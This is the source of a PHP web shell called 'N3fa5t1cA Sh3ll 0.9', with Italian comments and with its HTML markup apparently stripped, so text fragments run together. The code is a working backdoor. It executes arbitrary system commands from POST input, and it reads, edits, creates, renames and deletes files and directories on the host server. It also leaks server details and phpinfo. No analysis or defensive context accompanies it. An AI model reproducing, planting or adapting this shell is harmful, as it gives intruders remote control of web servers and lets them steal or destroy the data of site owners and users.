N3fa5t1cA Sh3ll

0.9 realized by Dr. nefatso
PHP shell in :
Server :
USER agent :
SERVER ADDR :
CLIENT ADDR :
Safe Mode: OFF"; $safe_mode_on="Safe Mode: 0N"; (ini_get("safe_mode") == 0) ? $safe_status= $safe_mode_off : $safe_status= $safe_mod_on; echo $safe_status; echo"
"; if (!get_magic_quotes_gpc()) echo "magic_quotes_gpc: OFF"; else echo "magic_quotes_gpc: ON"; ?>
">PHP_INFO
directory :
.....ExEcTuTe

"; if ($Wphpinfo) phpinfo(); //andiamo a eseguire dei comandi sulla shell.. elseif($_POST['go_cmd']) { $cmd_output=shell_exec($_POST['cmd']); echo "output di ".$_POST['cmd']."

".$cmd_output."

"; } //rinominiamo un file elseif($_POST['go_rename']) { echo "sto rinominando il file...."; if (rename($_POST['old_name'],$_POST['new_name'])) echo "
file rinominato con successo.."; } elseif ($Wfileremove!='' ) { echo "rimozine file ".htmlspecialchars($Wfileremove); ( unlink($Wfileremove) ) ? die( " riuscita") : die( " fallita forse non hai i permessi di scrittura....."); } elseif($Wfileimage!='') echo "

"; elseif ($_POST['new_file'] ) { $file = $_POST['name_new_file']; new_file($file,$_POST['new_file_text']); } //editiamo un file elseif ($Wfiledit!='') { if (!(is_writable($Wfiledit) and is_readable($Wfiledit))) die("file non leggibbile e/o scrivibile"); $fldtp=fopen($Wfiledit,'r'); $testo = htmlspecialchars(fread($fldtp,filesize($Wfiledit))); fclose($fldtp); echo " "; }//fine if di $Wfiledit elseif($Wfiletoedit and $_POST['save_edit_change'] ) { $file_change_text=fopen ($Wfiletoedit,'w+'); echo "salvataggio in ".htmlspecialchars($Wfiletoedit)."
"; $testo_new=gpc_text($_POST['test'] ); fwrite($file_change_text,$testo_new); fclose($file_change_text); echo "salvataggio eseguito con successo...."; }//fine di if // rimoviamo la dir elseif($Wrmdir!=''){ if (rmdir($Wrmdir)) echo $Wrmdir.' rimossa con successo' ; else echo $Wrmdir.' non sono riuscito a rimuoverla'; } //stampiamo il testo del file elseif ($Wfile!='' ){ echo "sto aprendo

".htmlspecialchars($Wfile)."

"; if (!is_readable($Wfile)) die("file non leggibbile"); $flop = fopen($Wfile,'r'); $read=htmlspecialchars(fread($flop,filesize($Wfile))); fclose($flop); echo "

". $read."

"; lista_file($dir);} elseif ($_POST['go_dir']) echo "sto aprendo ".$_POST['dir']."
".lista_file($_POST['dir']); else echo "".lista_file($dir).""; function lista_file($dir) { if (!is_dir($dir)) die(htmlspecialchars($dir)." non è una directory"); if ($handle = opendir($dir)) { $return = ''; while (false !== ($file = readdir($handle))) {// in questo while vengono richiamati tutti i file presenti nella cartella selezionata $return .= link_genera($file,$dir);//questo genera i vari link.... }//fine while $return .= '

nome dato

tipo dato

view

edit

remove

permessi

maggiori informazioni

'; } else $return = 'non sono ruscito ad aprire la cartella ,...'; closedir($handle); return $return ; }// fine function function link_genera($a,$dir) { $image = array("jpg","gif",'png','JPG','GIF','PNG','jpeg','JPEG','bnp'); $re=''; $info = get_perms($dir.'/'.$a); if(is_dir($dir.'/'.$a)) $re.= "".htmlspecialchars($a).' directoryREMOVE' ; else { $re.="".htmlspecialchars($a).""; if (in_array(file_get_type($dir.'/'.$a),$image)) $re.=" immagineVIEW "; else $re .= " fileview"; $re.=" EDIT REMOVE"; } $flsz= filesize($dir.'/'.$a); $re .= " ".$info."dimensione ".$flsz.""; $re.=''; return $re; } function get_perms($fn) { $perms=fileperms($fn); if($perms==false) return false; $info=''; // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function new_file($file,$text){ $text = gpc_text($text); if (file_exists($file)) die ("file gia esistente se vuoi lo puoi modificare ma non scriverci sopra....."); echo "sto aprendo ".htmlspecialchars($file)."
"; $nw_fl_pn=fopen($file,'w+'); if ($nw_fl_pn==false) die ("non posso creare il nuovo file"); echo "sto scrivendo su ".htmlspecialchars($file)."
"; fwrite($nw_fl_pn,$text); fclose($nw_fl_pn); echo "file creato ".htmlspecialchars($dir); } function file_get_type($file) { $array = explode ('.',$file);return ($array[(sizeof($array))-1]);} function gpc_text($a){if(!get_magic_quotes_gpc())return $a;$a=str_replace("\'", "'",$a);$a=str_replace('\"', '"',$a);$a=str_replace ("\x5C\x5C","\x5C",$a);return $a;} ?>